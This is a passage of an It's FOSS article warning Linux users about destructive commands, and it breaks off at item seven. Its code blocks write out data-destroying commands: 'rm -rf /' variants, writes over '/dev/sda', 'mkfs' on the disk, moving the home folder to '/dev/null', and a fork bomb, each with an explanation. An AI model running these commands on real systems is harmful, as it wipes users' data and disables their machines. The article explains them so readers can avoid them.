<div class="site-top-header-inner-wrap site-header-row site-header-row-has-sides site-header-row-no-center">
<div class="site-header-top-section-left site-header-section site-header-section-left">
</div>
<div class="site-header-top-section-right site-header-section site-header-section-right">
<div class="site-header-item site-header-focus-item" data-section="kadence_customizer_header_social">
<div class="header-social-wrap"><div class="header-social-inner-wrap element-social-inner-wrap social-show-label-false social-style-filled"><a href="https://www.facebook.com/itsfoss" aria-label="Facebook" target="_blank" rel="noopener noreferrer" class="social-button header-social-item social-link-facebook"><span class="kadence-svg-iconset"><svg class="kadence-svg-icon kadence-facebook-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32"><title>Facebook</title><path d="M31.997 15.999c0-8.836-7.163-15.999-15.999-15.999s-15.999 7.163-15.999 15.999c0 7.985 5.851 14.604 13.499 15.804v-11.18h-4.062v-4.625h4.062v-3.525c0-4.010 2.389-6.225 6.043-6.225 1.75 0 3.581 0.313 3.581 0.313v3.937h-2.017c-1.987 0-2.607 1.233-2.607 2.498v3.001h4.437l-0.709 4.625h-3.728v11.18c7.649-1.2 13.499-7.819 13.499-15.804z"></path>
</svg></span></a><a href="https://twitter.com/itsfoss2" aria-label="Twitter" target="_blank" rel="noopener noreferrer" class="social-button header-social-item social-link-twitter"><span class="kadence-svg-iconset"><svg class="kadence-svg-icon kadence-twitter-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="26" height="28" viewBox="0 0 26 28"><title>Twitter</title><path d="M25.312 6.375c-0.688 1-1.547 1.891-2.531 2.609 0.016 0.219 0.016 0.438 0.016 0.656 0 6.672-5.078 14.359-14.359 14.359-2.859 0-5.516-0.828-7.75-2.266 0.406 0.047 0.797 0.063 1.219 0.063 2.359 0 4.531-0.797 6.266-2.156-2.219-0.047-4.078-1.5-4.719-3.5 0.313 0.047 0.625 0.078 0.953 0.078 0.453 0 0.906-0.063 1.328-0.172-2.312-0.469-4.047-2.5-4.047-4.953v-0.063c0.672 0.375 1.453 0.609 2.281 0.641-1.359-0.906-2.25-2.453-2.25-4.203 0-0.938 0.25-1.797 0.688-2.547 2.484 3.062 6.219 5.063 10.406 5.281-0.078-0.375-0.125-0.766-0.125-1.156 0-2.781 2.25-5.047 5.047-5.047 1.453 0 2.766 0.609 3.687 1.594 1.141-0.219 2.234-0.641 3.203-1.219-0.375 1.172-1.172 2.156-2.219 2.781 1.016-0.109 2-0.391 2.906-0.781z"></path>
</svg></span></a><a href="https://instagram.com/itsfoss" aria-label="Instagram" target="_blank" rel="noopener noreferrer" class="social-button header-social-item social-link-instagram"><span class="kadence-svg-iconset"><svg class="kadence-svg-icon kadence-instagram-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32"><title>Instagram</title><path d="M21.138 0.242c3.767 0.007 3.914 0.038 4.65 0.144 1.52 0.219 2.795 0.825 3.837 1.821 0.584 0.562 0.987 1.112 1.349 1.848 0.442 0.899 0.659 1.75 0.758 3.016 0.021 0.271 0.031 4.592 0.031 8.916s-0.009 8.652-0.030 8.924c-0.098 1.245-0.315 2.104-0.743 2.986-0.851 1.755-2.415 3.035-4.303 3.522-0.685 0.177-1.304 0.26-2.371 0.31-0.381 0.019-4.361 0.024-8.342 0.024s-7.959-0.012-8.349-0.029c-0.921-0.044-1.639-0.136-2.288-0.303-1.876-0.485-3.469-1.784-4.303-3.515-0.436-0.904-0.642-1.731-0.751-3.045-0.031-0.373-0.039-2.296-0.039-8.87 0-2.215-0.002-3.866 0-5.121 0.006-3.764 0.037-3.915 0.144-4.652 0.219-1.518 0.825-2.795 1.825-3.833 0.549-0.569 1.105-0.975 1.811-1.326 0.915-0.456 1.756-0.668 3.106-0.781 0.374-0.031 2.298-0.038 8.878-0.038h5.13zM15.999 4.364v0c-3.159 0-3.555 0.014-4.796 0.070-1.239 0.057-2.084 0.253-2.824 0.541-0.765 0.297-1.415 0.695-2.061 1.342s-1.045 1.296-1.343 2.061c-0.288 0.74-0.485 1.586-0.541 2.824-0.056 1.241-0.070 1.638-0.070 4.798s0.014 3.556 0.070 4.797c0.057 1.239 0.253 2.084 0.541 2.824 0.297 0.765 0.695 1.415 1.342 2.061s1.296 1.046 2.061 1.343c0.74 0.288 1.586 0.484 2.825 0.541 1.241 0.056 1.638 0.070 4.798 0.070s3.556-0.014 4.797-0.070c1.239-0.057 2.085-0.253 2.826-0.541 0.765-0.297 1.413-0.696 2.060-1.343s1.045-1.296 1.343-2.061c0.286-0.74 0.482-1.586 0.541-2.824 0.056-1.241 0.070-1.637 0.070-4.797s-0.015-3.557-0.070-4.798c-0.058-1.239-0.255-2.084-0.541-2.824-0.298-0.765-0.696-1.415-1.343-2.061s-1.295-1.045-2.061-1.342c-0.742-0.288-1.588-0.484-2.827-0.541-1.241-0.056-1.636-0.070-4.796-0.070zM14.957 6.461c0.31-0 0.655 0 1.044 0 3.107 0 3.475 0.011 4.702 0.067 1.135 0.052 1.75 0.241 2.16 0.401 0.543 0.211 0.93 0.463 1.337 0.87s0.659 0.795 0.871 1.338c0.159 0.41 0.349 1.025 0.401 2.16 0.056 1.227 0.068 1.595 0.068 4.701s-0.012 3.474-0.068 4.701c-0.052 1.135-0.241 1.75-0.401 2.16-0.211 0.543-0.463 0.93-0.871 1.337s-0.794 0.659-1.337 0.87c-0.41 0.16-1.026 0.349-2.16 0.401-1.227 0.056-1.595 0.068-4.702 0.068s-3.475-0.012-4.702-0.068c-1.135-0.052-1.75-0.242-2.161-0.401-0.543-0.211-0.931-0.463-1.338-0.87s-0.659-0.794-0.871-1.337c-0.159-0.41-0.349-1.025-0.401-2.16-0.056-1.227-0.067-1.595-0.067-4.703s0.011-3.474 0.067-4.701c0.052-1.135 0.241-1.75 0.401-2.16 0.211-0.543 0.463-0.931 0.871-1.338s0.795-0.659 1.338-0.871c0.41-0.16 1.026-0.349 2.161-0.401 1.073-0.048 1.489-0.063 3.658-0.065v0.003zM16.001 10.024c-3.3 0-5.976 2.676-5.976 5.976s2.676 5.975 5.976 5.975c3.3 0 5.975-2.674 5.975-5.975s-2.675-5.976-5.975-5.976zM16.001 12.121c2.142 0 3.879 1.736 3.879 3.879s-1.737 3.879-3.879 3.879c-2.142 0-3.879-1.737-3.879-3.879s1.736-3.879 3.879-3.879zM22.212 8.393c-0.771 0-1.396 0.625-1.396 1.396s0.625 1.396 1.396 1.396 1.396-0.625 1.396-1.396c0-0.771-0.625-1.396-1.396-1.396v0.001z"></path>
</svg></span></a><a href="https://www.youtube.com/c/itsfoss" aria-label="YouTube" target="_blank" rel="noopener noreferrer" class="social-button header-social-item social-link-youtube"><span class="kadence-svg-iconset"><svg class="kadence-svg-icon kadence-youtube-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="28" height="28" viewBox="0 0 28 28"><title>YouTube</title><path d="M11.109 17.625l7.562-3.906-7.562-3.953v7.859zM14 4.156c5.891 0 9.797 0.281 9.797 0.281 0.547 0.063 1.75 0.063 2.812 1.188 0 0 0.859 0.844 1.109 2.781 0.297 2.266 0.281 4.531 0.281 4.531v2.125s0.016 2.266-0.281 4.531c-0.25 1.922-1.109 2.781-1.109 2.781-1.062 1.109-2.266 1.109-2.812 1.172 0 0-3.906 0.297-9.797 0.297v0c-7.281-0.063-9.516-0.281-9.516-0.281-0.625-0.109-2.031-0.078-3.094-1.188 0 0-0.859-0.859-1.109-2.781-0.297-2.266-0.281-4.531-0.281-4.531v-2.125s-0.016-2.266 0.281-4.531c0.25-1.937 1.109-2.781 1.109-2.781 1.062-1.125 2.266-1.125 2.812-1.188 0 0 3.906-0.281 9.797-0.281v0z"></path>
</svg></span></a><a href="https://t.me/itsfoss_official" aria-label="Telegram" target="_blank" rel="noopener noreferrer" class="social-button header-social-item social-link-telegram"><span class="kadence-svg-iconset"><svg class="kadence-svg-icon kadence-telegram-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 32 32"><title>Telegram</title><path d="M26.070 3.996c-0.342 0.026-0.659 0.105-0.952 0.23l0.019-0.007h-0.004c-0.285 0.113-1.64 0.683-3.7 1.547l-7.382 3.109c-5.297 2.23-10.504 4.426-10.504 4.426l0.062-0.024s-0.359 0.118-0.734 0.375c-0.234 0.15-0.429 0.339-0.582 0.56l-0.004 0.007c-0.184 0.27-0.332 0.683-0.277 1.11 0.090 0.722 0.558 1.155 0.894 1.394 0.34 0.242 0.664 0.355 0.664 0.355h0.008l4.883 1.645c0.219 0.703 1.488 4.875 1.793 5.836 0.18 0.574 0.355 0.933 0.574 1.207 0.106 0.14 0.23 0.257 0.379 0.351 0.071 0.042 0.152 0.078 0.238 0.104l0.008 0.002-0.050-0.012c0.015 0.004 0.027 0.016 0.038 0.020 0.040 0.011 0.067 0.015 0.118 0.023 0.773 0.234 1.394-0.246 1.394-0.246l0.035-0.028 2.883-2.625 4.832 3.707 0.11 0.047c1.007 0.442 2.027 0.196 2.566-0.238 0.543-0.437 0.754-0.996 0.754-0.996l0.035-0.090 3.734-19.129c0.106-0.472 0.133-0.914 0.016-1.343-0.126-0.443-0.404-0.808-0.774-1.043l-0.007-0.004c-0.277-0.171-0.613-0.272-0.972-0.272-0.033 0-0.066 0.001-0.099 0.003l0.005-0zM25.969 6.046c-0.004 0.063 0.008 0.056-0.020 0.177v0.011l-3.699 18.93c-0.016 0.027-0.043 0.086-0.117 0.145-0.078 0.062-0.14 0.101-0.465-0.028l-5.91-4.531-3.57 3.254 0.75-4.79 9.656-9c0.398-0.37 0.265-0.448 0.265-0.448 0.028-0.454-0.601-0.133-0.601-0.133l-12.176 7.543-0.004-0.020-5.851-1.972c0.012-0.004 0.022-0.008 0.032-0.013l-0.002 0.001 0.032-0.016 0.031-0.011s5.211-2.196 10.508-4.426c2.652-1.117 5.324-2.242 7.379-3.11 2.055-0.863 3.574-1.496 3.66-1.53 0.082-0.032 0.043-0.032 0.102-0.032z"></path>
</svg></span></a><a href="https://itsfoss.com/feed/" aria-label="RSS" target="_blank" rel="noopener noreferrer" class="social-button header-social-item social-link-rss"><span class="kadence-svg-iconset"><svg class="kadence-svg-icon kadence-rss-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="24" height="28" viewBox="0 0 24 28"><title>RSS</title><path d="M8 20c0-1.109-0.891-2-2-2s-2 0.891-2 2 0.891 2 2 2 2-0.891 2-2zM13.484 21.469c-0.266-4.844-4.109-8.687-8.953-8.953-0.141-0.016-0.281 0.047-0.375 0.141s-0.156 0.219-0.156 0.359v2c0 0.266 0.203 0.484 0.469 0.5 3.203 0.234 5.781 2.812 6.016 6.016 0.016 0.266 0.234 0.469 0.5 0.469h2c0.141 0 0.266-0.063 0.359-0.156s0.156-0.234 0.141-0.375zM19.484 21.484c-0.266-8.125-6.844-14.703-14.969-14.969-0.156-0.016-0.266 0.031-0.359 0.141-0.094 0.094-0.156 0.219-0.156 0.359v2c0 0.266 0.219 0.484 0.484 0.5 6.484 0.234 11.766 5.516 12 12 0.016 0.266 0.234 0.484 0.5 0.484h2c0.141 0 0.266-0.063 0.359-0.156 0.109-0.094 0.156-0.219 0.141-0.359zM24 6.5v15c0 2.484-2.016 4.5-4.5 4.5h-15c-2.484 0-4.5-2.016-4.5-4.5v-15c0-2.484 2.016-4.5 4.5-4.5h15c2.484 0 4.5 2.016 4.5 4.5z"></path>
</svg></span></a></div></div></div>
<div class="site-header-item site-header-focus-item" data-section="kadence_customizer_header_dark_mode">
<div class="kadence-color-palette-header-switcher"><div class="kadence-color-palette-switcher kcps-style-button kcps-type-both"><button class="kadence-color-palette-toggle kadence-color-toggle" aria-label="Change site color palette"><span class="kadence-color-palette-light"><span class="kadence-color-palette-icon"><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-sun-alt-svg" fill="currentColor" version="1.1" width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><title>Light</title><path d="M8 4c-2.209 0-4 1.791-4 4s1.791 4 4 4c2.209 0 4-1.791 4-4s-1.791-4-4-4zM8 13c0.552 0 1 0.448 1 1v1c0 0.552-0.448 1-1 1s-1-0.448-1-1v-1c0-0.552 0.448-1 1-1zM8 3c-0.552 0-1-0.448-1-1v-1c0-0.552 0.448-1 1-1s1 0.448 1 1v1c0 0.552-0.448 1-1 1zM15 7c0.552 0 1 0.448 1 1s-0.448 1-1 1h-1c-0.552 0-1-0.448-1-1s0.448-1 1-1h1zM3 8c0 0.552-0.448 1-1 1h-1c-0.552 0-1-0.448-1-1s0.448-1 1-1h1c0.552 0 1 0.448 1 1zM12.95 11.536l0.707 0.707c0.39 0.39 0.39 1.024 0 1.414s-1.024 0.39-1.414 0l-0.707-0.707c-0.39-0.39-0.39-1.024 0-1.414s1.024-0.39 1.414 0zM3.050 4.464l-0.707-0.707c-0.391-0.391-0.391-1.024 0-1.414s1.024-0.391 1.414 0l0.707 0.707c0.391 0.391 0.391 1.024 0 1.414s-1.024 0.391-1.414 0zM12.95 4.464c-0.39 0.391-1.024 0.391-1.414 0s-0.39-1.024 0-1.414l0.707-0.707c0.39-0.391 1.024-0.391 1.414 0s0.39 1.024 0 1.414l-0.707 0.707zM3.050 11.536c0.39-0.39 1.024-0.39 1.414 0s0.391 1.024 0 1.414l-0.707 0.707c-0.391 0.39-1.024 0.39-1.414 0s-0.391-1.024 0-1.414l0.707-0.707z"></path>
</svg></span></span><span class="kadence-color-palette-label">Light</span></span><span class="kadence-color-palette-dark"><span class="kadence-color-palette-icon"><span class="kadence-svg-iconset svg-baseline"><svg aria-hidden="true" class="kadence-svg-icon kadence-moon-alt-svg" fill="currentColor" version="1.1" width="16" height="16" viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"><title>Dark</title><path d="M11.185 1.008c-0.941-0.543-1.947-0.874-2.962-1.008 1.921 2.501 2.262 6.012 0.587 8.913s-4.886 4.361-8.012 3.948c0.623 0.812 1.412 1.518 2.354 2.061 3.842 2.218 8.756 0.902 10.974-2.941s0.902-8.756-2.94-10.974z"></path>
</svg></span></span><span class="kadence-color-palette-label">Dark</span></span></button></div></div></div>
<div class="site-header-item site-header-focus-item" data-section="kadence_customizer_header_button">
<div class="header-button-wrap"><div class="header-button-inner-wrap"><a href="https://ko-fi.com/itsfoss" target="_blank" rel="noopener noreferrer" class="button header-button button-size-medium button-style-filled">Donate</a></div></div></div>
</div>
</div>
</div>
</div>
</div>
<div class="site-main-header-wrap site-header-row-container site-header-focus-item site-header-row-layout-standard" data-section="kadence_customizer_header_main">
<div class="site-header-row-container-inner">
<div class="site-container">
<div class="site-main-header-inner-wrap site-header-row site-header-row-has-sides site-header-row-no-center">
<div class="site-header-main-section-left site-header-section site-header-section-left">
<div class="site-header-item site-header-focus-item" data-section="title_tagline">
<div class="site-branding branding-layout-standard site-brand-logo-only"><a class="brand has-logo-image" href="https://itsfoss.com/" rel="home" aria-label="It&#039;s FOSS"><img width="200" height="80" src="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" class="custom-logo jetpack-lazy-image" alt="itsfoss header logo" data-attachment-id="99929" data-permalink="https://itsfoss.com/itsfoss-header-logo/" data-orig-file="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" data-orig-size="200,80" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="itsfoss-header-logo" data-image-description="" data-image-caption="" data-medium-file="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" data-large-file="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" data-lazy-src="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></div></div>
</div>
<div class="site-header-main-section-right site-header-section site-header-section-right">
<div class="site-header-item site-header-focus-item site-header-item-main-navigation header-navigation-layout-stretch-false header-navigation-layout-fill-stretch-false" data-section="kadence_customizer_primary_navigation">
<nav id="site-navigation" class="main-navigation header-navigation nav--toggle-sub header-navigation-style-standard header-navigation-dropdown-animation-none" role="navigation" aria-label="Primary Navigation">
<div class="primary-menu-container header-menu-container">
<ul id="primary-menu" class="menu"><li id="menu-item-93490" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-93490"><a href="https://itsfoss.com/about/">About</a></li>
<li id="menu-item-93493" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent menu-item-93493"><a href="https://itsfoss.com/all-blog-posts/">Latest</a></li>
<li id="menu-item-93492" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-93492"><a target="_blank" rel="noopener" href="https://news.itsfoss.com/">Linux News</a></li>
<li id="menu-item-93494" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-93494"><a target="_blank" rel="noopener" href="https://itsfoss.community/">Forum</a></li>
<li id="menu-item-93576" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-93576"><a target="_blank" rel="noopener" href="https://linuxhandbook.com/">Linux Server Stuff</a></li>
<li id="menu-item-siq-selectbox" class="menu-item ">
<div id="siq-menu-searchbox-wrap" class="siq-menu-searchbox-wrap "><div id="siq-expsearch-cont" class="siq-expsearch-cont">
<form class="siq-expsearch" action="https://itsfoss.com">
<input type="search" placeholder="Search" name="s" class="siq-expsearch-input">
<span class="siq-expsearch-icon" style='color:#000000'></span>
</form>
</div></div></li></ul> </div>
</nav>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="mobile-header" class="site-mobile-header-wrap">
<div class="site-header-inner-wrap">
<div class="site-header-upper-wrap">
<div class="site-header-upper-inner-wrap">
<div class="site-main-header-wrap site-header-focus-item site-header-row-layout-standard site-header-row-tablet-layout-default site-header-row-mobile-layout-default ">
<div class="site-header-row-container-inner">
<div class="site-container">
<div class="site-main-header-inner-wrap site-header-row site-header-row-has-sides site-header-row-no-center">
<div class="site-header-main-section-left site-header-section site-header-section-left">
<div class="site-header-item site-header-focus-item" data-section="title_tagline">
<div class="site-branding mobile-site-branding branding-layout-standard branding-tablet-layout-inherit site-brand-logo-only branding-mobile-layout-inherit"><a class="brand has-logo-image" href="https://itsfoss.com/" rel="home" aria-label="It&#039;s FOSS"><img width="200" height="80" src="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" class="custom-logo jetpack-lazy-image" alt="itsfoss header logo" data-attachment-id="99929" data-permalink="https://itsfoss.com/itsfoss-header-logo/" data-orig-file="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" data-orig-size="200,80" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="itsfoss-header-logo" data-image-description="" data-image-caption="" data-medium-file="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" data-large-file="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png" data-lazy-src="https://itsfoss.com/wp-content/uploads/2022/07/itsfoss-header-logo.png?is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" /></a></div></div>
</div>
<div class="site-header-main-section-right site-header-section site-header-section-right">
<div class="site-header-item site-header-focus-item site-header-item-navgation-popup-toggle" data-section="kadence_customizer_mobile_trigger">
<div class="mobile-toggle-open-container">
<button id="mobile-toggle" class="menu-toggle-open drawer-toggle menu-toggle-style-default" aria-label="Open menu" data-toggle-target="#mobile-drawer" data-toggle-body-class="showing-popup-drawer-from-right" aria-expanded="false" data-set-focus=".menu-toggle-close">
<span class="menu-toggle-icon"><span class="kadence-svg-iconset"><svg aria-hidden="true" class="kadence-svg-icon kadence-menu-svg" fill="currentColor" version="1.1" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24"><title>Toggle Menu</title><path d="M3 13h18c0.552 0 1-0.448 1-1s-0.448-1-1-1h-18c-0.552 0-1 0.448-1 1s0.448 1 1 1zM3 7h18c0.552 0 1-0.448 1-1s-0.448-1-1-1h-18c-0.552 0-1 0.448-1 1s0.448 1 1 1zM3 19h18c0.552 0 1-0.448 1-1s-0.448-1-1-1h-18c-0.552 0-1 0.448-1 1s0.448 1 1 1z"></path>
</svg></span></span>
</button>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</header>
<div id="inner-wrap" class="wrap hfeed kt-clear">
<link rel='stylesheet' id='kadence-content-css' href='https://itsfoss.com/wp-content/themes/kadence/assets/css/content.min.css?ver=1.1.27' media='all' />
<div id="primary" class="content-area">
<div class="content-container site-container">
<main id="main" class="site-main" role="main">
<div class="content-wrap">
<article id="post-101619" class="entry content-bg single-entry post-101619 post type-post status-publish format-standard has-post-thumbnail hentry category-list category-terminal-tricks">
<div class="entry-content-wrap">
<header class="entry-header post-title title-align-inherit title-tablet-align-inherit title-mobile-align-inherit">
<div class="entry-taxonomies">
<span class="category-links term-links category-style-normal">
<a href="https://itsfoss.com/category/list/" rel="tag">List</a> | <a href="https://itsfoss.com/category/terminal-tricks/" rel="tag">Terminal Tools and Tricks</a> </span>
</div>
<h1 class="entry-title">10 Destructive Linux Commands You Should Never Run</h1><div class="entry-meta entry-meta-divider-dot">
<span class="posted-by"><span class="meta-label">By</span><span class="author vcard"><a class="url fn n" href="https://itsfoss.com/">Abhishek Prakash</a></span></span> <span class="updated-on">
<span class="meta-label">Updated on</span><time class="entry-date published updated" datetime="2022-09-11T11:16:53+05:30">September 11, 2022</time> </span>
<div class="meta-comments"><a class="meta-comments-link anchor-scroll" href="#comments">3 Comments</a></div><span class="kt-reading-time-wrap"><span class="kt-reading-time"> <span class="kt-reading-time-label">Reading Time:</span> 7 <span class="kt-reading-time-postfix">minutes</span> </span></span></div>
</header>
<div class="entry-content single-content">
<p><em>What are the most dangerous Linux commands?</em></p>
<p>I have been asked this question numerous times and I have avoided answering that because <strong>there is no definite list of dangerous Linux commands</strong>.</p>
<p>You have the tools that enable you to control and modify every aspect of your operating system. I am not trying to scare you but if you are unfamiliar with the commands and tools, you can screw up your system pretty easily.</p>
<p>Imagine the scenario of a young child in a household. There are numerous ways the kid can hurt herself. But does this mean the child should not be allowed outside the crib? That would be damaging to her growth. </p>
<p>This is where parents set boundaries and guide the child. Don&#8217;t go near the fire. Don&#8217;t poke your fingers in the power outlets. As the child grows and gains experience, she can turn the stove on, make a fire in the fireplace and plug in the power cables. </p>
<p>Similarly, if you are aware of a few known risky commands, you may avoid falling into the traps of trolls trying to trick you into running commands and messing up your system.</p>
<p>As you gain experience and know the meaning and usages of the commands and tools, less will be the chances of destroying your system with silly and tricky commands.</p>
<p>My teammate Sreenath gathered some of the popular dangerous Linux commands. Let&#8217;s see how they work.</p>
<h2>1. rm -rf /*</h2>
<p>This one probably is the most infamous command circling in all kinds of social media. You&#8217;ll often find trolls commenting this in various discussions.</p>
<p>The command <code>rm</code> is used to remove files/directories. The flags <code>-r </code>and <code>-f</code> are used to denote recursive removal of all files inside the specified directory. Now, without root privilege, this command won&#8217;t do any harm. </p>
<p>Running the <a rel="noopener" href="https://itsfoss.com/sudo-rm-rf/" data-type="post" data-id="90939" target="_blank" data-lasso-id="86001">command sudo rm -rf /</a> also will not create any issues as most distributions provide a failsafe option. You need to specify &#8211;no-preserver-root with it to actually run it.</p>
<pre class="wp-block-code"><code>sudo rm -rf / --no-preserve-root</code></pre>
<p>However, a simpler version of this could be:</p>
<pre class="wp-block-code"><code>sudo rm -rf /*</code></pre>
<p>It will start deleting all the files recursively in the root directory, and at some particular time, your system freezes with a message &#8220;Error deleting file.&#8221; Once rebooted, you will be sent to the <strong>grub-rescue</strong> prompt.</p>
<figure class="wp-block-video presto-block-video  presto-provider-youtube" style="--plyr-color-main: #00b6ba; --presto-player-logo-width: 150px; ">
<presto-player id="presto-player-1" src="//www.youtube.com/embed/AiKPo14uVNU?iv_load_policy=3&amp;modestbranding=1&amp;playinline=0&amp;showinfo=0&amp;rel=0&amp;enablejsapi=1" media-title="Here&#039;s what happens when you run sudo rm -rf / in Linux?" css="" class="presto-video-id-4 presto-preset-id-1 skin-default" skin="default" icon-url="https://itsfoss.com/wp-content/plugins/presto-player/img/sprite.svg" preload="" poster="//img.youtube.com/vi/AiKPo14uVNU/maxresdefault.jpg">
<div class="presto-iframe-fallback-container">
<iframe style="width: 100%" title="Youtube Video" class="presto-fallback-iframe" id="presto-iframe-fallback-1" data-src="https://www.youtube.com/embed/AiKPo14uVNU?iv_load_policy=3&amp;modestbranding=1&amp;playsinline=1&amp;showinfo=0&amp;rel=0&amp;enablejsapi=1" allowfullscreen allowtransparency allow="autoplay"></iframe>
</div>
</presto-player>
</figure> <script>
            var player = document.querySelector('presto-player#presto-player-1');
            player.video_id = 4;
                                                player.preset = {"id":1,"name":"Default","slug":"default","icon":"format-video","skin":"default","play-large":true,"rewind":true,"play":true,"fast-forward":true,"progress":true,"current-time":true,"mute":true,"volume":true,"speed":false,"pip":false,"fullscreen":true,"captions":false,"reset_on_end":true,"auto_hide":true,"captions_enabled":false,"save_player_position":true,"sticky_scroll":false,"sticky_scroll_position":"bottom right","on_video_end":"select","play_video_viewport":false,"hide_youtube":false,"lazy_load_youtube":false,"hide_logo":false,"border_radius":0,"caption_style":"","caption_background":"","is_locked":true,"cta":[""],"watermark":[""],"email_collection":[""],"action_bar":[""],"created_by":0,"created_at":"2022-07-20 22:00:34","updated_at":"2022-07-20 22:00:40","deleted_at":""};
                                                                player.chapters = [];
                                                                player.overlays = [];
                                                                player.tracks = [];
                                                                player.branding = {"logo":"","color":"#00b6ba","logo_width":150,"player_css":""};
                                                                player.blockAttributes = {"id":4,"src":"https:\/\/www.youtube.com\/watch?v=AiKPo14uVNU","preset":1,"video_id":"AiKPo14uVNU","color":"#00b3ff","pip":true,"fullscreen":true,"captions":false,"hideControls":true,"playLarge":true,"chapters":[],"overlays":[],"speed":true,"title":"Here's what happens when you run sudo rm -rf \/ in Linux?"};
                                                                                            player.skin = "default";
                                                                player.analytics = false;
                                                                player.automations = true;
                                                                player.provider = "youtube";
                                                                player.video_id = 4;
                                                                                                                        player.provider_video_id = "AiKPo14uVNU";
                                                                player.youtube = {"noCookie":true,"channelId":"UCEU9D6KIShdLeTRyH3IdSvw","show_count":false};
                                    </script>
<h2>2. Overwrite your partition</h2>
<p>If you are familiar with file systems, you probably know what /dev/sda is. It is (usually) your disk drive partition. The <code>&gt;</code> operator is used to write the output of its preceding command to the specified location provided.</p>
<p>Once you run any command and write it to /dev/sda, say:</p>
<pre class="wp-block-code"><code>echo "Hello" &gt; /dev/sda</code></pre>
<p>This will replace your partition containing all data needed to boot the system with the string &#8220;Hello&#8221;.</p>
<h2>3. Move everything into the void</h2>
<p>There is a void inside every Linux system. And that void is /dev/null. </p>
<p>Whatever you throw into this area is lost forever. Also, it reports the writing process as a success after discarding the data, which is the main reason for its destructiveness</p>
<pre class="wp-block-code"><code>mv /home/user/* /dev/null</code></pre>
<p>The <a rel="noopener" href="https://linuxhandbook.com/mv-command/" data-type="URL" data-id="https://linuxhandbook.com/mv-command/" target="_blank" data-lasso-id="86008">mv command</a> is used to move or rename files/directories. In the above command, you move all the files inside the home directory to the void. While the root system is not destroyed, all your personal data will be lost.</p>
<h2>4. Format your hard drive</h2>
<p><a rel="noopener" href="https://linuxhandbook.com/mkfs-command/" data-type="URL" data-id="https://linuxhandbook.com/mkfs-command/" target="_blank" data-lasso-id="86009">mkfs</a> is a command-line utility, used to format disks and partitions. It is a super handy tool for creating partitions for various installations. But the same command can format your drive also. Formatting your drive means deleting all the files needed for the system to boot. </p>
<pre class="wp-block-code"><code>mkfs.ext3 /dev/sda</code></pre>
<p>The command does its job and you end up with a messed up system beyond recovery.</p>
<h2>5. Fork bomb</h2>
<p>This cute-looking, random combination of special characters and symbols is powerful enough to freeze a running system by exhausting the system resources.</p>
<pre class="wp-block-code"><code>:(){:|:&amp;};:</code></pre>
<p>&amp; &#8211; Shell Background Operator. It informs the shell to put the command in the background. Here, it defines a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. This process keeps on executing again and again till the system freezes.</p>
<p>As the name suggests, it forks itself and eventually becomes a chain bomb and eats up all the system resources. You&#8217;ll be forced to reboot the system, which is not as bad as the other commands in this list.</p>
<h2>6. Overwrite important configuration files</h2>
<p>While this is not a command by itself, it is more of a precautionary thing. </p>
<p>As mentioned above, the &#8220;>&#8221; operator is used to write to a file. It just discards anything already present in the file and writes new data provided to it.</p>
<pre class="wp-block-code"><code>command > config_filename</code></pre>
<p>Now, if you use some important configuration file as the place to write data, it will replace the content, leaving a broken system.</p>
<h2>7. Replace partition with garbage data</h2>
